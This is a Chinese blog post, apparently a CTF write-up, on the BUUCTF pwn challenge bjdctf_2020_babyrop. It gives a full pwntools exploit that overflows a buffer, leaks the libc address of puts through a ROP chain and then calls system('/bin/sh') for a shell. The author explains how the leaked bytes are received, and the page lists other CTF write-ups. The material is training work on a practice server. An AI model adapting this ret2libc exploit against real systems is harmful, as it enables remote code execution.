关于BUUCTF 之bjdctf_2020_babyrop的wp的最实在解释

最新推荐文章于 2024-05-18 21:41:29 发布
最新推荐文章于 2024-05-18 21:41:29 发布
阅读量749 收藏
点赞数
分类专栏: 二进制pwn学习 文章标签: pwn linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Probeginner/article/details/121567300
版权 
from os import system
from pwn import*
context.log_level='debug'
p=remote('node4.buuoj.cn',25535)
libc_ = ELF('./libc-2.23.so')
elf = ELF('./2020')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#p.recvuntil("Pull up your sword and tell me u story!")
#p.recv(3)
paylaod = 'a'*0x28 + p64(0x400733 )+p64(puts_got) +  p64(puts_plt)    +  p64(0x4006ad)  
p.sendline(paylaod)
p.recv()#this is important because of it ,the flag can be get
addr_=u64(p.recv(6).ljust(8,'\x00'))
#addr_=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))

print(hex(addr_))
base_=addr_-libc_.symbols['puts']
system_=base_ + libc_.symbols['system']
bin_=base_+libc_.search('/bin/sh').next()
pay = 'a'*0x28 + p64(0x400733) +p64(bin_) + p64(system_)
#p.recv(3)
#p.recvuntil("Pull up your sword and tell me u story!")
p.sendline(pay)
p.interactive()

这里addr_=u64(p.recv(6).ljust(8,'\x00'))这一句这个之所以这样写:我们首先来看接收到的write的地址,利用print(hex(addr_))的两种结果:
1:在这里插入图片描述
2:利用print((addr_))的结果:
在这里插入图片描述
通过以上两种输出我们可以看到,这个选着接收6个字符是由地址的16进制形式,这里是:0x7f4cb1e36690数一下可以发现是6个字节

另外本题还需要注意的是利用context.log_level='debug'时,再gdb里观察可以发现和远程程序交流的收、发数据情况,由此正确使用p.recv语句。关于题目的思路其余师傅的wp讲的很清楚,正常解法。

Hvf0x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WP.rar_phone_windows phone_wp
09-14
2012年10月31日,Windows Phone 8.0手机开发培训讲义,包括课件和源码!
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 283
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 2131
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
BUUCTF Web [BJDCTF2020]Easy MD5 & [ZJCTF 2019]NiZhuanSiWei 1
网安小趴菜
09-07 113
BUUCTF Web [BJDCTF2020]Easy MD5 & [ZJCTF 2019]NiZhuanSiWei 1
crypto-babyLCG(NPUCTF2020)
耐酸碱高温固化材料近距离传输研究
11-30 1099
显然如果要解密出flag明文那必须要反推出最初的seed参数,将后面产生的随机数全部复原。的原因是为了保持向量各个数值bit位保持一致(关于格密码基础概念推荐这篇。因为前20个随机数的高位是已知的,接下来思路是针对这个式子做变形。其中A,B均可通过a,b,h推出。现在将以上关系式写成矩阵形式。由于h均为已知,那么现在找到低位l递推的关系式,又因为。近期研究格密码过程中遇到的一个很好的题目,记录一下。则可以推出所有低位l与l1的关系式,简写为。构造lattice,最后一项取2。将s拆分为高位h和低位l变为。
BUU-[BJDCTF2020]Easy MD5-WP
m0_62851980的博客
08-02 882
我们只需找到md5值都是两个0e开头的字符串即可,php里面在做==,!=的时候会先把两边的类型转成一样的,0e开头,php会认为它是科学计数法,两边都是0。这样既可完成md5碰撞。也就是说我们需要找到一个字符串,它被md5加密后会含有276f7227,与万能密码原理类似。md5函数在指定了true的时候,是返回的原始16字符的二进制格式,这里是===,科学计数法不可用,但仍然可1用数组绕过,最后得到flag。也就是说,需要我们找到字符串a与b不同,但在md5加密后相同的字符串。...
关于buuctf[OGeek2019]babyrop 1的一些些小结
Probeginner的博客
11-25 638
首先对于题目分析: 正常的32位小端序,checksec一下发现开了NX…………算了直接进正题。1.open函数的返回值,如果执行成功,他将返回一个文件描述,如果失败,他将返回-1.这里显然是成功了 2.文件描述符:0,1,2:是标准I/O输入、输出、错误。这里open执行成功了会返回3。 3.此时read(fd,&buf,4u)的意思是把fd指向的那个随机数输入buf中。 这里需要注意的是:strcmp函数可用“\x00”来截断,进而覆盖下面的v5变量,随后让 第二个read函数读入的“a1”
“第五空间”智能安全大赛部分WP
蚁景网安学院
06-28 2660
第五空间6月24日比赛的部分WP.目录cryptorosbrsa共模攻击,网上找了个板子改了改rom gmpy2 import * import libnum n = 0xa1d4d...
wordpress之wp_nav_menu使用说明
09-29
wp_nav_menu()方法位于wp-includes/nav-menu-templates.php文件中。
wpad.zip_firefox wpad_wp_wpad_wpad.dat
09-21
WPAD 自动进行浏览器的代理服务器的设置 该程序应用在WEB服务器上,以CGI方式运行 当访问WPAD.YOUR.DOMAIN/WPAD.DAT文件时, 该程序会将客户端的IP和PROXYS.TXT文件中 提供的域相匹配,返回以WPAD.TEMPL生成的WPAD....
wpform.professional.v2.10.fws.rar_Professional_V2 _wp
09-19
wp tools professional
lianyue-0.3.zip_lianyue_theme_wp主题_www.lianyue357.com
09-23
WP的一个不错的主题,颜色比较酷,自己现在使用中,拿来和大家分享
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 330
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
bjdctf_2020_babyropbjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 423
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 383
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
pwn7第七关
qq_18823653的博客
04-03 381
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
从“bjdctf_2020_babyrop2”中看泄露的地址的接收问题
Probeginner的博客
12-02 202
from pwn import* context.log_level=‘debug’ p=remote(‘node4.hackingfor.fun’,32264) binsh= 0x400967 pop_rdi= 0x4008a3 p.sendline("-1") #p.recvuntil(“EDG”) paylaod = b’a’*0x78 +p64(pop_rdi) + p64(binsh)+p64(0x4005d0) p.sendline(paylaod) p.interactive() ...
selinux的安全策略可以影响ntp的方式
最新发布
ALex_zry的博客
05-18 236
默认情况下,NTP使用UDP端口123进行通信,SELinux 策略需要允许NTP守护进程访问该端口。例如,可以创建一个策略,只允许受信任的NTP服务器与本地系统通信。:SELinux 提供了详细的日志和审计功能,可以帮助管理员监控和分析NTP守护进程的行为,以及检测任何潜在的安全问题。:SELinux 还可以限制NTP守护进程可以执行的操作,例如,是否可以打开套接字、是否可以读取或写入特定的设备等。:如果SELinux策略设置得太严格,可能会与NTP的正常操作发生冲突,导致NTP无法正常同步时间。
buuctf [第五章 ctf之re章]easy_rust 高级语言逆向wp
09-17
在这个buuctf的Easy Rust高级语言逆向题目中,我们需要对给定的Rust语言程序进行逆向分析,并找到程序的存放在flag变量中的答案。 首先,我们需要使用Rust编译器将给定的源代码进行编译。然后,我们可以使用静态分析和动态调试的方法来分析程序的行为。 通过分析程序的源代码,我们可以看到在main函数中,程序会读取一个名为input的字符串,并将它与一组数字进行逐个比较。如果比较结果为真,程序会将对应位置的flag字符进行替换。 为了分析比较的逻辑,我们可以使用动态调试的工具,如GDB。在GDB中,我们可以在比较之前的位置设置一个断点。然后,我们可以逐步执行程序,并观察变量的值来分析比较的逻辑。 在此题中,我们可以发现比较的逻辑为input[i] == flag[i] + 5。这意味着,我们需要将输入字符串中的每个字符和flag中的每个字符进行比较,比较结果为真则通过。 再进一步观察flag变量,我们会发现flag的初始值为"aaaaaa"。由于我们需要找到正确的flag,我们可以把它作为初始值来尝试不断的迭代,直到找到符合比较逻辑的正确flag。 综上所述,我们可以编写一个脚本来尝试不同的flag值,并与给定的input进行比较,直到找到正确的flag。最后,我们将找到的flag flag{r3v3r53_mUST_8E_"aI1_DONE"} 总结起来,buuctf的Easy Rust高级语言逆向题目通过分析Rust程序的源代码和使用动态调试工具,以及编写一个脚本来找到正确的flag值。通过理解比较逻辑和尝试不同的可能性,我们可以成功地完成这个题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值